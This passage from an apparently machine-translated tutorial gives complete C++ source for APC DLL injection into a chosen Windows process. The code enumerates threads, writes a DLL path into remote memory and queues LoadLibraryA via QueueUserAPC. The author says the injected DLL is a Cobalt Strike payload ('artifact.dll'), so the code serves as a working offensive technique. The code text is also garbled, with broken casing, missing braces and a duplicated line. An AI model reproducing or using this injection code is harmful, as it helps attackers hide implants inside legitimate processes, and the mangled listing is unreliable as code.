pThreadIdList ; return TRUE ; }Copy the code

Next comes the main function for APC injection, which first allocates memory remotely using VirtualAllocEx

lpAddr = :: VirtualAllocEx ( hProcess , nullptr , page_size , MEM_COMMIT | MEM_RESERVE , PAGE_EXECUTE_READWRITE ); 
Copy the code

Then write the DLL path to memory using WriteProcessMemory

: : WriteProcessMemory ( hProcess , lpAddr , wzDllFullPath , ( strlen ( wzDllFullPath ) + 1 ) * sizeof ( wzDllFullPath ), nullptr )Copy the code

Get the address of LoadLibraryA

PVOID loadLibraryAddress = :: GetProcAddress ( :: GetModuleHandle ( "kernel32.dll" ), "LoadLibraryA" ); 
Copy the code

If QueueUserAPC returns a value of NULL, the thread fails to traverse, and the value of fail is +1

for ( int i = dwThreadIdListLength - 1 ; i >= 0 ; I --) {HANDLE hThread = : OpenThread (THREAD_ALL_ACCESS, FALSE, pThreadIdList [I]); If (hThread) {// insert APC if (! :: QueueUserAPC (( PAPCFUNC ) loadLibraryAddress , hThread , ( ULONG_PTR ) lpAddr )) { fail ++ ; }}}Copy the code

Then in the main function, define the DLL address

strcpy_s ( wzDllFullPath , "C:\Users\61408\Desktop\artifact.dll" ); 
Copy the code

Open the handle using OpenProcess

HANDLE hProcess = OpenProcess ( PROCESS_VM_OPERATION | PROCESS_VM_WRITE , FALSE , ulProcessID ); 
Copy the code

Call the APCInject function you wrote earlier to implement APC injection

if ( ! APCInject ( hProcess , wzDllFullPath , pThreadIdList , dwThreadIdListLength ))
    {
        printf ( "Failed to inject DLL\n" );
        return FALSE ;
    } 
Copy the code

The complete code is as follows

// apcinject. CPP: This file contains the "main" function. Program execution begins and ends at this point. // #include <iostream> #include <Windows.h> #include <TlHelp32.h> using namespace std ; void ShowError ( const char * pszText ) { char szError [ MAX_PATH ] = { 0 }; :: wsprintf ( szError , "%s Error[%d]\n" , pszText , :: GetLastError ()); :: MessageBox ( NULL , szError , "ERROR" , MB_OK ); } // list all threads of the specified process BOOL GetProcessThreadList (DWORD th32ProcessID, DWORD ** ppThreadIdList, LPDWORD pThreadIdListLength) {DWORD dwThreadIdListLength = 0; DWORD dwThreadIdListMaxCount = 2000 ; LPDWORD pThreadIdList = NULL ; HANDLE hThreadSnap = INVALID_HANDLE_VALUE ; pThreadIdList = ( LPDWORD ) VirtualAlloc ( NULL , dwThreadIdListMaxCount * sizeof ( DWORD ), MEM_COMMIT | MEM_RESERVE , PAGE_READWRITE ); if ( pThreadIdList == NULL ) { return FALSE ; } RtlZeroMemory ( pThreadIdList , dwThreadIdListMaxCount * sizeof ( DWORD )); THREADENTRY32 th32 = { 0 }; HThreadSnap = CreateToolhelp32Snapshot (TH32CS_SNAPTHREAD, th32ProcessID); if ( hThreadSnap == INVALID_HANDLE_VALUE ) { return FALSE ; Th32. DwSize = sizeof (THREADENTRY32); BOOL bRet = Thread32First (hThreadSnap, &th32); BOOL bRet = Thread32First (hThreadSnap, &th32); while ( bRet ) { if ( th32 . th32OwnerProcessID == th32ProcessID ) { if ( dwThreadIdListLength >= dwThreadIdListMaxCount  ) { break ; } pThreadIdList [ dwThreadIdListLength ++ ] = th32 . th32ThreadID ; } bRet = Thread32Next ( hThreadSnap , & th32 ); } * pThreadIdListLength = dwThreadIdListLength ; * ppThreadIdList = pThreadIdList ; return TRUE ; } BOOL APCInject ( HANDLE hProcess , CHAR * wzDllFullPath , LPDWORD pThreadIdList , DWORD dwThreadIdListLength) {// Apply for memory PVOID lpAddr = NULL; SIZE_T page_size = 4096 ; lpAddr = :: VirtualAllocEx ( hProcess , nullptr , page_size , MEM_COMMIT | MEM_RESERVE , PAGE_EXECUTE_READWRITE ); if ( lpAddr == NULL ) { ShowError ( "VirtualAllocEx - Error\n\n" ); VirtualFreeEx ( hProcess , lpAddr , page_size , MEM_DECOMMIT ); CloseHandle ( hProcess ); return FALSE ; } // Copy the Dll path to memory if (FALSE == :: WriteProcessMemory ( hProcess , lpAddr , wzDllFullPath , ( strlen ( wzDllFullPath ) + 1 ) * sizeof ( wzDllFullPath ), nullptr )) { ShowError ( "WriteProcessMemory - Error\n\n" ); VirtualFreeEx ( hProcess , lpAddr , page_size , MEM_DECOMMIT ); CloseHandle ( hProcess ); return FALSE ; PVOID loadLibraryAddress = :: GetProcAddress (::) GetModuleHandle ( "kernel32.dll" ), "LoadLibraryA" ); // Iterate over the thread, insert APC float fail = 0; for ( int i = dwThreadIdListLength - 1 ; i >= 0 ; I --) {HANDLE hThread = : OpenThread (THREAD_ALL_ACCESS, FALSE, pThreadIdList [I]); If (hThread) {// insert APC if (! :: QueueUserAPC (( PAPCFUNC ) loadLibraryAddress , hThread , ( ULONG_PTR ) lpAddr )) { fail ++ ; } // Close the thread handle :: CloseHandle (hThread); hThread = NULL ; } } printf ( "Total Thread: %d\n" , dwThreadIdListLength ); printf ( "Total Failed: %d\n" , ( int ) fail ); If ((int) fail = = 0 | | dwThreadIdListLength/fail > 0.5) {printf (" Success to Inject APC \ n "); return TRUE ; } else { printf ( "Inject may be failed\n" ); return FALSE ; } } int main () { ULONG32 ulProcessID = 0 ; printf ( "Input the Process ID:" ); cin >> ulProcessID ; CHAR wzDllFullPath [ MAX_PATH ] = { 0 }; LPDWORD pThreadIdList = NULL ; DWORD dwThreadIdListLength = 0 ; #ifndef _WIN64 strcpy_s ( wzDllFullPath , "C:\Users\61408\Desktop\artifact.dll" ); #else // _WIN64 strcpy_s ( wzDllFullPath , "C:\Users\61408\Desktop\artifact.dll" ); #endif if ( ! GetProcessThreadList ( ulProcessID , & pThreadIdList , & dwThreadIdListLength )) { printf ( "Can not list the threads\n" ); exit ( 0 ); } / / HANDLE to open the HANDLE hProcess = OpenProcess (PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ulProcessID); if ( hProcess == NULL ) { printf ( "Failed to open Process\n" ); return FALSE ; } // inject if (! APCInject ( hProcess , wzDllFullPath , pThreadIdList , dwThreadIdListLength )) { printf ( "Failed to inject DLL\n" ); return FALSE ; } return 0 ; }Copy the code

Instead of using the process name -> PID, I manually input the parameters to the ulProcessID using cin >> ulProcessID

Here you can choose to write a MessageBox DLL, here I directly use the CS DLL, the demo effect is shown below